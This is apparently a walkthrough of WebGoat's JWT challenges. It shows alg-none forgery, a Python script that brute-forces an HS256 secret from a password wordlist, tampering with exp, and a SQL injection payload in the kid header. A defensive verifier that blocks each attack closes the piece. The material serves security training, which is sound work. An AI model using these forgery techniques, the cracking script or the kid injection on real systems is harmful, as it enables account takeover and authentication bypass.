JWT Token
3/
Use jwt.io to decode the token; you will get the username.
5/
After decoding, you will see that the algorithm is HS256 and admin is false.
First, edit alg to "none". Next, edit the admin value to "true".


Edit the cookie and send:

8/
eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDE1MDk3MiwiZXhwIjoxNjQwMTUxMDMyLCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.dlRNogwJ7D5mrP2ZvXlG5LW1d1U-vqq4DNld1EeN-FA
First, we must find the key of this token; after that, change the username field in this token to 'WebGoat' to solve this challenge (the algorithm is HS256).
I use 1000000-password-seclists.txt to brute-force it.
Code to find key:
```python
import jwt

# Token captured from the challenge (HS256-signed); the secret is unknown.
jwt_str = R'eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDEzOTY5NywiZXhwIjoxNjQwMTM5NzU3LCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.1XUCWT94XEVfGV1OBGV4cLMJhqCMbzWzZI39I01Exmc'

# Try every candidate from the wordlist as the HMAC secret.
with open('1000000-password-seclists.txt') as f:
    for line in f:
        key = line.strip()
        try:
            jwt.decode(jwt_str, key, algorithms=['HS256'])
            print('Key found : ', key)
            break
        except jwt.exceptions.ExpiredSignatureError:
            # The signature verified but the token is expired: the key is still correct.
            print('Key found : ', key)
            break
        except jwt.exceptions.InvalidSignatureError:
            continue
    else:
        print("No key found.")
```

I found that the key is victory; use this key to decode and change username to WebGoat:


When we submit it, we will receive a message that the JWT token is expired:

Change the exp value and submit the token again to solve this challenge:


10/
This challenge is similar to challenge 5.
Go to the file logs.txt; we will get the token:

Modify the request with Burp Suite; we will see the Authorization header:

We will edit the token we got and then use it as the value of the Authorization header:
The algorithm is "None":

Edit the admin field to "true":

Send the request with the new token to solve the challenge:

11/
First, use jwt.io to decode:

In the header, you will see "kid"; it seems different from the other challenges.
Take a look at the source code on WebGoat's GitHub:

Here we can see that the key will be selected from the database where id=kid. We can use SQLi to make it return our own key:
Something we can use is:
' union select 'key' from INFORMATION_SCHEMA.SYSTEM_USERS; --
When the query is executed, the key used to sign the JWT is 'key' (our own key).
But there is one more step: as you can see, before this value is used as the key for the JWT, it must be base64-decoded first:
TextCodec.BASE64.decode(rs.getString(1));
So we must edit the value for kid to:
' union select 'a2V5' from INFORMATION_SCHEMA.SYSTEM_USERS; --
And finally, edit username to "Tom", delete exp and use 'key' as the key:


Submit the new token and solve the challenge:
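
As an added example (not from this write-up or from WebGoat), here is a stdlib-only verifier showing the server-side fixes for the weaknesses used in challenges 3, 5, 8, 10 and 11: a pinned algorithm, a parameterised kid lookup, a constant-time signature check and a mandatory exp. The jwt_keys table, its key and every token built by sign() are constructed for the example.

```python
import base64, hashlib, hmac, json, sqlite3, time

# Constructed in-memory stand-in for WebGoat's jwt_keys table; as with the lesson's
# TextCodec.BASE64.decode(rs.getString(1)), keys are stored base64-encoded.
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE jwt_keys (id TEXT PRIMARY KEY, key TEXT)")
_db.execute("INSERT INTO jwt_keys VALUES ('webgoat_key', ?)",
            (base64.b64encode(b"long-random-secret-not-in-any-wordlist").decode(),))

def _b64d(s): return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))
def _b64e(b): return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def resolve_key(kid):
    # kid is bound as a parameter, never concatenated into the SQL text, so the
    # "' union select 'a2V5' ..." payload is simply an id that does not exist.
    row = _db.execute("SELECT key FROM jwt_keys WHERE id = ?", (kid,)).fetchone()
    return base64.b64decode(row[0]) if row else None

def verify(token, now=None):
    """Return the claims of a valid token, otherwise raise ValueError with the reason."""
    try:
        h_b64, p_b64, sig_b64 = token.split(".")
        header, claims = json.loads(_b64d(h_b64)), json.loads(_b64d(p_b64))
    except Exception as e:
        raise ValueError(f"malformed token: {e}")
    if header.get("alg") != "HS256":           # pinned algorithm: "none"/"None" rejected
        raise ValueError("unexpected alg")
    key = resolve_key(str(header.get("kid", "")))
    if key is None: raise ValueError("unknown kid")
    expected = hmac.new(key, f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64d(sig_b64)):   # constant-time comparison
        raise ValueError("bad signature")
    now = int(time.time()) if now is None else now
    if not isinstance(claims.get("exp"), int) or claims["exp"] <= now:  # exp is mandatory
        raise ValueError("missing or expired exp")
    return claims

def check(token, now=None):  # 'ok' or the rejection reason, for tests and logs
    try:
        verify(token, now)
        return "ok"
    except ValueError as e:
        return str(e)

def sign(claims, kid, key, alg="HS256"):
    """Mint a test token; alg is a parameter only so that bad tokens can be built."""
    h = _b64e(json.dumps({"alg": alg, "kid": kid}).encode())
    p = _b64e(json.dumps(claims).encode())
    sig = b"" if alg == "none" else hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{_b64e(sig)}"
```

Each rejection reason maps to one of the challenges above: an unsigned "none" token, a token signed with a guessed secret such as victory, an expired or exp-less token, and a kid that is not a real key id all fail before any claim is trusted.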
